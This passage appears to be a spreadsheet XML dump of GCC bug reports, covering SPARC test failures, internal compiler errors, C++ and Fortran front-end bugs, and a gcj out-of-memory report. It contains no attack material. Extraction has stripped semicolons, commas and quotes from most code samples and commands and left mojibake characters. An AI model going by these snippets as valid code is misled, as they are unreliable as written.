UNRESOLVED: gcc.target/sparc/fshift.c scan-assembler fsrl32\\t%
UNRESOLVED: gcc.target/sparc/fshift.c scan-assembler fsra32\\t%
FAIL: gcc.target/sparc/fucmp.c scan-assembler fucmple8\\t%
FAIL: gcc.target/sparc/fucmp.c scan-assembler fucmpne8\\t%
FAIL: gcc.target/sparc/fucmp.c scan-assembler fucmpgt8\\t%
FAIL: gcc.target/sparc/fucmp.c scan-assembler fucmpeq8\\t%
FAIL: gcc.target/sparc/lzd.c scan-assembler-times lzd\\t% 3
FAIL: gcc.target/sparc/vis3misc.c (test for excess errors)
UNRESOLVED: gcc.target/sparc/vis3misc.c scan-assembler fchksm16\\t%
UNRESOLVED: gcc.target/sparc/vis3misc.c scan-assembler pdistn\\t%
UNRESOLVED: gcc.target/sparc/vis3misc.c scan-assembler fmean16\\t%
UNRESOLVED: gcc.target/sparc/vis3misc.c scan-assembler fpadd64\\t%
UNRESOLVED: gcc.target/sparc/vis3misc.c scan-assembler fpsub64\\t%
FAIL: gcc.target/sparc/xmul.c scan-assembler umulxhi\\t%
FAIL: gcc.target/sparc/xmul.c scan-assembler xmulx\\t%
FAIL: gcc.target/sparc/xmul.c scan-assembler xmulxhi\\t%
The problem seems to be the same everywhere:
$ /var/gcc/regression/trunk/11-gcc/build/gcc/xgcc -B/var/gcc/regression/trunk/11-gcc/build/gcc/ /vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.target/sparc/cmask.c -mcpu=niagara3 -mvis -S -o cmask.s
$ grep cmask cmask.s 
        .file   cmask.c
        call    __builtin_vis_cmask8 0
        call    __builtin_vis_cmask16 0
        call    __builtin_vis_cmask32 0
  Rainer</t>
  </si>
  <si>
    <t>GCC-3935</t>
  </si>
  <si>
    <t>const static class member access</t>
  </si>
  <si>
    <t xml:space="preserve"> This is a multi-part message in MIME format.
 --------------D528AC452385712E29BC6EAC
 Content-Type: text/plain charset=gb2312
 Content-Transfer-Encoding: 7bit
 Attached is the source code to demo the problem.
 System info from $ uname -a
 SunOS riga 5.6 Generic_105181-22 sun4u sparc SUNWUltra-2
 compiler info from $ gcc -v
 Reading specs from
 /tmp/wxy/gnu/lib/gcc-lib/sparc-sun-solaris2.6/3.0/specs
 Configured with: ../gcc-3.0/configure --prefix=/tmp/wxy/gnu
 Thread model: posix
 gcc version 3.0
 Now the problem.  Two identical class foo1 and foo2.  Foo1's const
 static
 members are defined inline while foo2's are defined outside.  For foo2
 there is no problem access them.  But for foo1 expression like
 int left = foo1::left
 is allowed but expression like
 int side3 = i &gt; 0 ? foo1::left : foo1:: right
 is not.  This is shown by compile the main.cc as it is or un-comment
 the last two lines.  Un-commented version will not compile and give
 Undefined                       first referenced
  symbol                             in file
 foo1::left                          /var/tmp/cco03Uo1.o
 foo1::right                         /var/tmp/cco03Uo1.o
 ld: fatal: Symbol referencing errors. No output written to a.out
 collect2: ld returned 1 exit status
 but compile the commented version is OK.
 -- Xiaoyi
 --------------D528AC452385712E29BC6EAC
 Content-Type: text/plain charset=gb2312
  name=main.cc
 Content-Transfer-Encoding: 7bit
 Content-Disposition: inline
  filename=main.cc
 class foo1 {
 public:
     int dummy
     const static int left = 1
     const static int right = 2
 }
 class foo2 {
 public:
     int dummy
     const static int left
     const static int right
 }
 const int foo2::left = 3
 const int foo2::right = 4
 int main() {
     int i = 0
     int side1 = i &gt; 0 ? foo2::left : foo2::right
     i = side1
     int left = foo1::left
     int right = foo1::right
     int side2 = i &gt; 0 ? left : right
     i = side2
     //int side3 = i &gt; 0 ? foo1::left : foo1:: right
     //i = side3
 }
 --------------D528AC452385712E29BC6EAC--
Release:
unknown</t>
  </si>
  <si>
    <t>wxy</t>
  </si>
  <si>
    <t>GCC-19439</t>
  </si>
  <si>
    <t>Duplicate destructor accepted</t>
  </si>
  <si>
    <t>The following invalid code snippet is accepted (since at least gcc 2.95.3).
It is rejected when A gets instantiated but that could be diagnosed at
definition time IMHO.
===========================
template struct A
{
    ~A() {}
    ~A() {}
}
===========================</t>
  </si>
  <si>
    <t>GCC-44293</t>
  </si>
  <si>
    <t>[4.6 regression] FAIL: gcc.c-torture/compile/20040304-1.c</t>
  </si>
  <si>
    <t>On Linux/x86 revision 159912 gave
FAIL: gcc.c-torture/compile/20040304-1.c  -O3 -fomit-frame-pointer  (internal compiler error)
FAIL: gcc.c-torture/compile/20040304-1.c  -O3 -fomit-frame-pointer  (test for excess errors)
FAIL: gcc.c-torture/compile/20040304-1.c  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  (internal compiler error)
FAIL: gcc.c-torture/compile/20040304-1.c  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  (test for excess errors)
FAIL: gcc.c-torture/compile/20040304-1.c  -O3 -fomit-frame-pointer -funroll-loops  (internal compiler error)
FAIL: gcc.c-torture/compile/20040304-1.c  -O3 -fomit-frame-pointer -funroll-loops  (test for excess errors)
FAIL: gcc.c-torture/compile/20040304-1.c  -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/compile/20040304-1.c  -O3 -g  (test for excess errors)
Revision 159873 is OK.</t>
  </si>
  <si>
    <t>GCC-60693</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE on funny memcpy</t>
  </si>
  <si>
    <t>This little program:
int main()
{
  char buf[4096]
  memcpy(buf (void *)0xffffffffff600000 4096)
  return 0
}
does this:
$ gcc ice.c
ice.c: In function â€˜mainâ€™:
ice.c:4:3: warning: incompatible implicit declaration of built-in function â€˜memcpyâ€™ [enabled by default]
   memcpy(buf (void *)0xffffffffff600000 4096)
   ^
ice.c:4:9: internal compiler error: in ix86_copy_addr_to_reg at config/i386/i386.c:21886
   memcpy(buf (void *)0xffffffffff600000 4096)
         ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccJqACry.out file please attach this to your bugreport.
This is gcc (GCC) 4.8.2 20131212 (Red Hat 4.8.2-7).</t>
  </si>
  <si>
    <t>GCC-2615</t>
  </si>
  <si>
    <t>IRIX C++ cout gets bus error</t>
  </si>
  <si>
    <t xml:space="preserve">	A trivial C++ program gets a bus error when running
Release:
3.0 20010423 (prerelease)
Environment:
System: IRIX64 numa1 6.5 10120732 IP26
host: mips-sgi-irix6.5
build: mips-sgi-irix6.5
target: mips-sgi-irix6.5
configured with: /usr/people/jarausch/ZIP/EGCS/gcc30-cvs/configure --prefix=/usr/LOCAL --with-local-prefix=/usr/LOCAL
How-To-Repeat:
just run this one:
#include 
using std::cout
int main() {
  cout &lt;&lt; Hello world\n
  cout &lt;&lt; Hello world again\n
}</t>
  </si>
  <si>
    <t>GCC-61501</t>
  </si>
  <si>
    <t>spurious conversion warning with -Wconversion when calling isnan(double x)</t>
  </si>
  <si>
    <t>When compiling:
--------------------------
#include 
int test(double x) {
	return isnan(x)
}
--------------------------
with
 gcc-4.9.0 -Wconversion -c /tmp/conversion_warn.cxx
a spurious warning is emitted:
/tmp/conversion_warn.cxx: In function 'int test(double)':
/tmp/conversion_warn.cxx:4:9: warning: conversion to 'float' from 'double' may alter its value [-Wfloat-conversion]
  return isnan(x)
         ^
This is what the output of compiling with -E of the above sample looks (with includes from glibc 2.5.1):
-----------------------------
int test(double x) {
 return (sizeof (x) == sizeof (float) ? __isnanf (x) : sizeof (x) == sizeof (double) ? __isnan (x) : __isnanl (x))
}
-----------------------------
(This looks a little like Bug 51294 but that was reported fixed a long time ago.)</t>
  </si>
  <si>
    <t>niemayer</t>
  </si>
  <si>
    <t>GCC-31610</t>
  </si>
  <si>
    <t>ICE with transfer merge in gfc_conv_expr_descriptor</t>
  </si>
  <si>
    <t>Testcase (4.3.0 20070415):
    Character(len=20) string
    Logical Dimension(20) :: a
    string = transfer(merge (transfer(achar (ichar('A')) x len(string)) string a) repeat(x len(string)) )
end</t>
  </si>
  <si>
    <t>GCC-33420</t>
  </si>
  <si>
    <t>Assert_Failure at atree.adb:886 on function call</t>
  </si>
  <si>
    <t>SomefunctionReturningPointer is actually named Focus. There is also a procedure of the same name in the package if the procedure is commented out the crash does not happen. The test case is the best description of the problem. It is short enough to be easily comprehensible.</t>
  </si>
  <si>
    <t>jdgressett</t>
  </si>
  <si>
    <t>GCC-26660</t>
  </si>
  <si>
    <t>[4.2 Regression] PCH vs -save-temps ICE while GCing</t>
  </si>
  <si>
    <t>create an empty file called t.hh.
create a file called t1.cc with:
#include t.hh
extern __inline__ int
stat (__const char *__path struct stat *__statbuf) throw ()
{
--------------
compile the PCH like:
g++ t.hh
and the source file with:
g++ t1.cc -save-temps --param ggc-min-expand=0 --param ggc-min-heapsize=0 
And see the following ICE:
t1.cc: In function â€˜int stat(const char* stat*)â€™:
t1.cc:4: error: expected `}' at end of input
t1.cc: At global scope:
t1.cc:4: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-12862</t>
  </si>
  <si>
    <t>[3.3 regression] Conflicts Between typedefs/enums and Namespace Member Declarations</t>
  </si>
  <si>
    <t>G++ rejects the following valid code claiming that 'void A::Thingo()' is a
redeclaration of 'typedef int Thingo'.
The error goes away if:
  - you wrap the typedef in an anonymous namespace
  - you include the definition of void A::Thingo() in
    namespace A.
The error remains if:
  - you replace the typedef with enum { Thingo }
---- test.cc ----
typedef int Thingo
namespace A
{
    void
    Thingo()
}
void
A::Thingo()
{
}
int
main()
{
    A::Thingo()
    return 0
}
---- EOF ----
$ g++ test.cc
test.cc: In function `void A::Thingo()':
test.cc:11: `void A::Thingo()' redeclared as different kind of symbol
test.cc:1: previous declaration of `typedef int Thingo'
$ g++ -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.2.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/u
sr/share/info --enable-shared --enable-threads=posix --disable-checking --with-s
ystem-zlib --enable-__cxa_atexit --host=i386-redhat-linux
Thread model: posix
gcc version 3.2.2 20030222 (Red Hat Linux 3.2.2-5)</t>
  </si>
  <si>
    <t>hlaw</t>
  </si>
  <si>
    <t>GCC-62111</t>
  </si>
  <si>
    <t>ICE when building Linux kernel for sh64</t>
  </si>
  <si>
    <t>Created attachment 33303
Reduced preprocessed source
When trying to build the kernel with an sh64 cross-compiler I get the following error:
  sh64-linux-gnu-gcc -Wp-MDarch/sh/kernel/.setup.o.d  -nostdinc -isystem /usr/lib/gcc/sh64-linux-elf/4.9.1/include -I../arch/sh/include -Iarch/sh/include/generated  -I../include -Iinclude -I../arch/sh/include/uapi -Iarch/sh/include/generated/uapi -I../include/uapi -Iinclude/generated/uapi -include ../include/linux/kconfig.h  -I../arch/sh/kernel -Iarch/sh/kernel -D__KERNEL__ -m5-64media-nofpu -ml -Wa-isa=shmedia -ffreestanding  -I../arch/sh/include/cpu-sh5 -Iarch/sh/include/cpu-sh5  -I../arch/sh/include/cpu-common -Iarch/sh/include/cpu-common  -I../arch/sh/include/mach-common -Iarch/sh/include/mach-common -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -Wno-format-security -pipe -m5-64media-nofpu -ml -Wa-isa=shmedia -ffreestanding  -I../arch/sh/include/cpu-sh5 -Iarch/sh/include/cpu-sh5  -I../arch/sh/include/cpu-common -Iarch/sh/include/cpu-common  -I../arch/sh/include/mach-common -Iarch/sh/include/mach-common -fno-delete-null-pointer-checks -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fno-stack-protector -Wno-unused-but-set-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -Wdeclaration-after-statement -Wno-pointer-sign -fno-strict-overflow -fconserve-stack -Werror=implicit-int -Werror=strict-prototypes -Werror=date-time -DCC_HAVE_ASM_GOTO -Werror    -DKBUILD_STR(s)=#s -DKBUILD_BASENAME=KBUILD_STR(setup)  -DKBUILD_MODNAME=KBUILD_STR(setup) -c -o arch/sh/kernel/setup.o ../arch/sh/kernel/setup.c
../arch/sh/kernel/setup.c: In function 'setup_arch':
../arch/sh/kernel/setup.c:312:1: internal compiler error: in sh_print_operand at config/sh/sh.c:1359
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
{standard input}: Assembler messages:
{standard input}:365: Warning: partial line at end of file ignored
Preprocessed source stored into /tmp/ccQ2JuUO.out file please attach this to your bugreport.
A reduced version of the preprocessed source is attached</t>
  </si>
  <si>
    <t>GCC-18177</t>
  </si>
  <si>
    <t>[4.0 regression] ICE with const_cast for undeclared variable</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE when compiled with mainline:
=============================
void foo()
{
    X
    const_cast&lt;int
}
=============================
bug.cc: In function `void foo()':
bug.cc:3: error: 'X' was not declared in this scope
bug.cc:4: internal compiler error: tree check: expected class 'type' have
'exceptional' (error_mark) in build_pointer_type_for_mode at tree.c:4118
Please submit a full bug report [etc.]
The regression appeared in March 2004:
: Search converges between 2004-03-01-trunk (#446) and 2004-04-01-trunk (#447).</t>
  </si>
  <si>
    <t>GCC-4096</t>
  </si>
  <si>
    <t>libstdc++-v3/include/Makefile.in has several errors in it</t>
  </si>
  <si>
    <t>The new Makefile.in added with 3.0.1 namely
libstdc++-v3/include/Makefile.in has several problems:
* The lengths of lines are excessive - HP-UX 11.00's vi
  can't edit them.
[Do not edit Makefile.in as a user if Makefile.am exists
as it does in this case. -ljrittle]
* The path for the rules involving gthr.h gthr-single.h
  and gthr-default.h seem to be one level too low causing
  the build to bomb out.
[See PR4082 for this one issue. -ljrittle]
* Use of -d with the $(INSTALL) command isn't
  cross-platform (many install scripts don't support it) -
  see the install-data-local rule.
* make install installs the Makefile.in Makefile and
  Makefile.am files into the install tree of gcc !!!!!
[You ran configure in $(srcdir).  This is not recommended
and strange issues arise since *most/all* developers
run configure in an $(objdir) - ljrittle.]
Release:
3.0.1
Environment:
HP-UX 11.00 but probably applies to most platforms
How-To-Repeat:
You won't be able to build with make or make install
on HP-UX 11.00.</t>
  </si>
  <si>
    <t>GCC-28995</t>
  </si>
  <si>
    <t>[4.2 Regression] libgfortran build now fails on Darwin PPC</t>
  </si>
  <si>
    <t>Somewhere between r116775 and r116795 the build of libgfortran has become broken on Darwin PPC. The build now fails with...
/bin/sh ./libtool --mode=compile /sw/src/fink.build/gcc4-4.1.999-20060908/darwin_objdir/./gcc/xgcc -B/sw/src/fink.build/gcc4-4.1.999-20060908/darwin_objdir/./gcc/ -B/sw/lib/gcc4/powerpc-apple-darwin8/bin/ -B/sw/lib/gcc4/powerpc-apple-darwin8/lib/ -isystem /sw/lib/gcc4/powerpc-apple-darwin8/include -isystem /sw/lib/gcc4/powerpc-apple-darwin8/sys-include -DHAVE_CONFIG_H -I. -I../../../gcc-4.2-20060908/libgfortran -I.  -iquote../../../gcc-4.2-20060908/libgfortran/io -I../../../gcc-4.2-20060908/libgfortran/../gcc -I../../../gcc-4.2-20060908/libgfortran/../gcc/config -I../.././gcc -D_GNU_SOURCE  -std=gnu99 -Wall -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wextra -Wwrite-strings -O2 -g -O2  -c -o maxloc0_4_r16.lo `test -f 'generated/maxloc0_4_r16.c' || echo '../../../gcc-4.2-20060908/libgfortran/'`generated/maxloc0_4_r16.c
/sw/src/fink.build/gcc4-4.1.999-20060908/darwin_objdir/./gcc/xgcc -B/sw/src/fink.build/gcc4-4.1.999-20060908/darwin_objdir/./gcc/ -B/sw/lib/gcc4/powerpc-apple-darwin8/bin/ -B/sw/lib/gcc4/powerpc-apple-darwin8/lib/ -isystem /sw/lib/gcc4/powerpc-apple-darwin8/include -isystem /sw/lib/gcc4/powerpc-apple-darwin8/sys-include -DHAVE_CONFIG_H -I. -I../../../gcc-4.2-20060908/libgfortran -I. -iquote../../../gcc-4.2-20060908/libgfortran/io -I../../../gcc-4.2-20060908/libgfortran/../gcc -I../../../gcc-4.2-20060908/libgfortran/../gcc/config -I../.././gcc -D_GNU_SOURCE -std=gnu99 -Wall -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wextra -Wwrite-strings -O2 -g -O2 -c ../../../gcc-4.2-20060908/libgfortran/generated/maxloc0_4_r16.c  -fno-common -DPIC -o .libs/maxloc0_4_r16.o
/var/tmp//ccs0SY9t.s:905:Unknown pseudo-op: .literal16</t>
  </si>
  <si>
    <t>GCC-15127</t>
  </si>
  <si>
    <t>[4.0 Regression] spill_failure (class DIREG) in gcc.c-torture/execute/20010915-1.c</t>
  </si>
  <si>
    <t>check-gcc reports failure on execute/20010915-1.c with optimizer settings:
 -O3 -fomit-frame-pointer -funroll-loops 
or
 -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions 
Reproduceable also with
 -O3 -funroll-all-loops
No failure with
 -O3 -funroll-loops
-------------------
Command and output:
-------------------
cvs $ cvs-gcc -v -save-temps -O3 -funroll-all-loops
/opt/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/20010915-1.c 
Reading specs from /opt/gcc/inst/lib/gcc/x86_64-unknown-linux-gnu/3.5.0/specs
Configured with: ../gcc/configure --prefix=/opt/gcc/inst --program-prefix=cvs-
--enable-languges=cc++ --disable-multilib
Thread model: posix
gcc version 3.5.0 20040424 (experimental)
 /opt/gcc/inst/libexec/gcc/x86_64-unknown-linux-gnu/3.5.0/cc1 -E -quiet -v
/opt/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/20010915-1.c -mtune=k8
-funroll-all-loops -O3 -o 20010915-1.i
ignoring nonexistent directory
/opt/gcc/inst/lib/gcc/x86_64-unknown-linux-gnu/3.5.0/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /opt/gcc/inst/include
 /opt/gcc/inst/lib/gcc/x86_64-unknown-linux-gnu/3.5.0/include
 /usr/include
End of search list.
 /opt/gcc/inst/libexec/gcc/x86_64-unknown-linux-gnu/3.5.0/cc1 -fpreprocessed
20010915-1.i -quiet -dumpbase 20010915-1.c -mtune=k8 -auxbase 20010915-1 -O3
-version -funroll-all-loops -o 20010915-1.s
GNU C version 3.5.0 20040424 (experimental) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 3.5.0 20040424 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
/opt/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/20010915-1.c: In function `x':
/opt/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/20010915-1.c:50: error: unable
to find a register to spill in class `DIREG'
/opt/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/20010915-1.c:50: error: this is
the insn:
(insn:HI 49 48 50 2 (parallel [
            (set (reg:CC 17 flags)
                (compare:CC (mem:BLK (reg/f:DI 38 r9 [73]) [0 A8])
                    (mem/s/u:BLK (reg/f:DI 41 r12 [163]) [4 S2 A8])))
            (use (reg:DI 6 bp [84]))
            (use (const_int 1 [0x1]))
            (use (reg:SI 19 dirflag))
            (clobber (reg/f:DI 4 si [orig:82 v ] [82]))
            (clobber (reg/f:DI 0 ax [83]))
            (clobber (reg:DI 2 cx [206]))
        ]) 639 {*cmpstrqi_nz_rex_1} (insn_list 46 (insn_list 47 (insn_list 48
(nil))))
    (expr_list:REG_UNUSED (reg:DI 2 cx [206])
        (expr_list:REG_UNUSED (reg/f:DI 0 ax [83])
            (expr_list:REG_UNUSED (reg/f:DI 4 si [orig:82 v ] [82])
                (expr_list:REG_DEAD (reg:SI 19 dirflag)
                    (expr_list:REG_UNUSED (reg:DI 2 cx [206])
                        (expr_list:REG_UNUSED (reg/f:DI 0 ax [83])
                            (expr_list:REG_UNUSED (reg/f:DI 4 si [orig:82 v ] [82])
                                (expr_list:REG_EQUAL (compare:CC (mem:BLK
(reg/f:DI 38 r9 [73]) [0 A8])
                                        (mem/s/u:BLK (symbol_ref/f:DI (*.LC0)
[flags 0x2] ) [4 S2 A8]))
                                    (nil))))))))))
/opt/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/20010915-1.c:50: internal
compiler error: in spill_failure at reload1.c:1887
--------------------
Additional info
--------------------
- same snapshot works fine on standard a normal i386 (P4)
- this testcase compiles fine with the following gcc:
gcc -v
Reading specs from /usr/lib/gcc-lib/x86_64-pc-linux-gnu/3.3.3/specs
Configured with: /var/tmp/portage/gcc-3.3.3/work/gcc-3.3.3/configure
--prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/3.3
--includedir=/usr/lib/gcc-lib/x86_64-pc-linux-gnu/3.3.3/include
--datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/3.3
--mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/3.3/man
--infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/3.3/info --enable-shared
--host=x86_64-pc-linux-gnu --target=x86_64-pc-linux-gnu --with-system-zlib
--enable-languages=cc++f77objc --enable-threads=posix --enable-long-long
--disable-checking --enable-cstdio=stdio --enable-clocale=generic
--enable-__cxa_atexit --enable-version-specific-runtime-libs
--with-gxx-include-dir=/usr/lib/gcc-lib/x86_64-pc-linux-gnu/3.3.3/include/g++-v3
--with-local-prefix=/usr/local --enable-shared --enable-nls
--without-included-gettext --disable-multilib
Thread model: posix
gcc version 3.3.3 20040217 (Gentoo Linux 3.3.3 propolice-3.3-7)
------------------
System info
------------------
Athon64 CPU VIA based MB
Kernel 2.6.6
glibc 2.3.3 20040207</t>
  </si>
  <si>
    <t>mseigneurin</t>
  </si>
  <si>
    <t>GCC-30246</t>
  </si>
  <si>
    <t>-ggdb3 does not cause -dD to be passed to cc1 for preprocessing</t>
  </si>
  <si>
    <t>Hello
Objects generated using '-ggdb3' are different if the compilation process is split in 2 steps (preprocessing and then compilation) or not.
The issue can be reproduced for the following 'main.c' code using the commands 'gcc -ggdb3 -c main.c' and 'gcc -ggdb3 -c main.c -E &gt; main.i gcc
-ggdb3 -c main.i'.
The resulting sizes are respectively 15400 and 3992 bytes. Using
'-ggdb2' the generated objects are the same. I guess some debugging
information is lost when the compilation process is split into two steps but as  anyway the macro information generated using 'ggdb3' is not usable with gcc 3.4.5 I did not investigated.
Does anybody know if this is the expected behavior or if it is a bug?
Does a workaround exist?
Thanks in advance and best regards
Serge
PS: we use gcc 3.4.5 on a Linux/Suse Linux Enterprise Server 9 but the
behavior is the same on Solaris 10 (same gcc version).
The main.c code:
#include 
int main(int argc char **argv)
{
 printf(Hello\n)
 return 0
}</t>
  </si>
  <si>
    <t>sb7206</t>
  </si>
  <si>
    <t>GCC-35416</t>
  </si>
  <si>
    <t>[4.4 Regression] tr1/2_general_utilities/shared_ptr/assign/shared_ptr_neg.cc</t>
  </si>
  <si>
    <t>With revision 132792 I got
FAIL: tr1/2_general_utilities/shared_ptr/assign/shared_ptr_neg.cc (test for excess errors)
on Linux/Intel64. Revision 132763 is OK.</t>
  </si>
  <si>
    <t>GCC-59858</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE: assign_by_spills at lra-assigns.c:1283</t>
  </si>
  <si>
    <t>Created attachment 31870
original source
trunk@206671
$ arm-oe-linux-uclibceabi-gcc -v -march=armv5te -marm -mthumb-interwork -Wall -Wstrict-prototypes -Wstrict-aliasing -funsigned-char -fno-builtin -fno-asm -msoft-float -std=gnu99 -mlittle-endian -mthumb -fno-stack-protector  -Os -pipe -g -feliminate-unused-debug-types -funit-at-a-time -fmerge-all-constants -fstrict-aliasing -fno-tree-loop-optimize -fno-tree-dominator-opts -fno-strength-reduce -fPIC   -c regex_arm_bug.i -o foo.o
Using built-in specs.
COLLECT_GCC=arm-oe-linux-uclibceabi-gcc
Target: arm-oe-linux-uclibceabi
Configured with: /scratch/obj.x86_64/oe/build/build/tmp-uclibc/work-shared/gcc-4.9.0+gitAUTOINC+e6e3a925b2-r0/git/configure --build=x86_64-linux --host=x86_64-linux --target=arm-oe-linux-uclibceabi --prefix=/scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/x86_64-linux/usr --exec_prefix=/scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/x86_64-linux/usr --bindir=/scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/x86_64-linux/usr/bin/armv5te-oe-linux-uclibceabi.gcc-cross-initial --sbindir=/scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/x86_64-linux/usr/bin/armv5te-oe-linux-uclibceabi.gcc-cross-initial --libexecdir=/scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/x86_64-linux/usr/libexec/armv5te-oe-linux-uclibceabi.gcc-cross-initial --datadir=/scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/x86_64-linux/usr/share --sysconfdir=/scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/x86_64-linux/etc --sharedstatedir=/scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/x86_64-linux/com --localstatedir=/scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/x86_64-linux/var --libdir=/scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/x86_64-linux/usr/lib/armv5te-oe-linux-uclibceabi.gcc-cross-initial --includedir=/scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/x86_64-linux/usr/include --oldincludedir=/scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/x86_64-linux/usr/include --infodir=/scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/x86_64-linux/usr/share/info --mandir=/scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/x86_64-linux/usr/share/man --disable-silent-rules --disable-dependency-tracking --with-libtool-sysroot=/scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/x86_64-linux --with-newlib --without-headers --disable-shared --disable-threads --disable-multilib --disable-__cxa_atexit --enable-languages=c --enable-target-optspace --program-prefix=arm-oe-linux-uclibceabi- --with-sysroot=/scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/qemuarm --with-build-sysroot=/scratch/obj.x86_64/oe/build/build/tmp-uclibc/work/armv5te-oe-linux-uclibceabi/gcc-cross-initial/4.9.0+gitAUTOINC+e6e3a925b2-r0/gcc-4.9.0+gitAUTOINC+e6e3a925b2/build.x86_64-linux.arm-oe-linux-uclibceabi/tmpsysroot --disable-libmudflap --disable-libgomp --disable-libssp --disable-libquadmath --with-system-zlib --disable-lto --disable-plugin --enable-decimal-float=no --with-float=soft --with-native-system-header-dir=/usr/include --disable-nls --disable-decimal-float --enable-__cxa_atexit
Thread model: single
gcc version 4.9.0 20140116 (experimental) (GCC) 
COLLECT_GCC_OPTIONS='-v' '-march=armv5te' '-marm' '-mthumb-interwork' '-Wall' '-Wstrict-prototypes' '-Wstrict-aliasing' '-funsigned-char' '-fno-builtin' '-fno-asm' '-mfloat-abi=soft' '-std=gnu99' '-mlittle-endian' '-mthumb' '-fno-stack-protector' '-Os' '-pipe' '-g' '-feliminate-unused-debug-types' '-funit-at-a-time' '-fmerge-all-constants' '-fstrict-aliasing' '-fno-tree-loop-optimize' '-fno-tree-dominator-opts' '-fPIC' '-c' '-o' 'foo.o' '-mtls-dialect=gnu'
 /scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/x86_64-linux/usr/libexec/armv5te-oe-linux-uclibceabi.gcc-cross-initial/gcc/arm-oe-linux-uclibceabi/4.9.0/cc1 -fpreprocessed regex_arm_bug.i -quiet -dumpbase regex_arm_bug.i -march=armv5te -marm -mthumb-interwork -mfloat-abi=soft -mlittle-endian -mthumb -mtls-dialect=gnu -auxbase-strip foo.o -g -Os -Wall -Wstrict-prototypes -Wstrict-aliasing -std=gnu99 -version -funsigned-char -fno-builtin -fno-asm -fno-stack-protector -feliminate-unused-debug-types -funit-at-a-time -fmerge-all-constants -fstrict-aliasing -fno-tree-loop-optimize -fno-tree-dominator-opts -fPIC -o - |
 /scratch/obj.x86_64/oe/build/build/tmp-uclibc/sysroots/x86_64-linux/usr/libexec/armv5te-oe-linux-uclibceabi.gcc-cross-initial/gcc/arm-oe-linux-uclibceabi/4.9.0/as -v -EL -march=armv5te -mthumb-interwork -mfloat-abi=soft -meabi=5 -o foo.o
GNU assembler version 2.23.2 (arm-oe-linux-uclibceabi) using BFD version (GNU Binutils) 2.23.2
GNU C (GCC) version 4.9.0 20140116 (experimental) (arm-oe-linux-uclibceabi)
	compiled by GNU C version 4.8.2 GMP version 5.1.1 MPFR version 3.1.2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C (GCC) version 4.9.0 20140116 (experimental) (arm-oe-linux-uclibceabi)
	compiled by GNU C version 4.8.2 GMP version 5.1.1 MPFR version 3.1.2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 00f3d8d9b2ef4564ff0d7914e89beffb
regex_arm_bug.i: In function 're_string_reconstruct':
regex_arm_bug.i:8920:20: warning: variable 'buf' set but not used [-Wunused-but-set-variable]
      unsigned char buf[6]
                    ^
regex_arm_bug.i: In function 're_search_internal':
regex_arm_bug.i:12785:1: internal compiler error: in assign_by_spills at lra-assigns.c:1283
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This is the lra_assert (asm_p) in the iter &gt; 0 block it seems.
Reducing..</t>
  </si>
  <si>
    <t>GCC-23617</t>
  </si>
  <si>
    <t>Out of memory when classpath contains jar file with zip-style comment</t>
  </si>
  <si>
    <t>When trying to compile a file with Debian's gcj 4.0.1-2 I got an error like this:
HelloWorld.java:0: error: malformed .zip archive in CLASSPATH:
/usr/lib/j2re1.5-sun/lib/ext/localedata.jar/
jc1: out of memory allocating 1342179073 bytes after a total of 389120 bytes
It turns out the .jar file the error mentions has a zipfile comment. (JAR is
